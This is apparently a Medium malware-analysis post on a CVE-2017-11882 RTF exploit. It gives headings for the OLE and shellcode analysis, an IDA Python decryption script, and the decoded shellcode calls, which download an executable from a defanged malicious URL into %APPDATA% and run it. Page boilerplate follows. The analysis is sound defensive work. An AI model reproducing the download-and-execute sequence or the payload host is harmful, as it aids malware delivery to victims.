CVE-2017–11882 RTF

Looking for an OLE

RTF Hide & Seek
rtfdump.py
No OLE objects detected to rtfdump
rtfobj
One OLE object instance identified

Analyzing the OLE

CLSID related to Equation Editor
OLE CLSID
OLE Native Stream

Return to stack

Shellcode map
Windbg return to stack

Analyzing the shellcode

from binascii import hexlify
import struct
import ctypes
from ctypes import *
def run():
startPos = 0x4013fe
xored = 0
index = 0
for index in range (startPos,startPos + 0x389, 4):
xored = xored * 0x22A76047
xored = xored + 0x2698B12D
for i in range (0,4):
patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i)
PatchByte(index+i, patched_byte)
Bytes before and after the decryption
Before the decryption
After the decryption
  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ hxxp://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

TL;DR

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

About S-wallet

Why You must have RDP/VPS In 2020

{UPDATE} 3D Sling Hack Free Resources Generator

Your IoT Devices Can Be Hacked. Here’s What We Should Do About It.

Parami Office Hour | March. 10

Malvertising: Hidden Advertising Threats You Need to Know About

How Can Corporate Crimes Be Prevented?

‼️Be aware of scams‼️

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
__fastcall

__fastcall

More from Medium

picoCTF — logon

Lot-of-Logs ! San-Diego CTF.

HTB: Cyber Apocalypse 22 — How the columns have turned Writeup

Cyber Apocalypse banner

Tool for making zip files with malicious content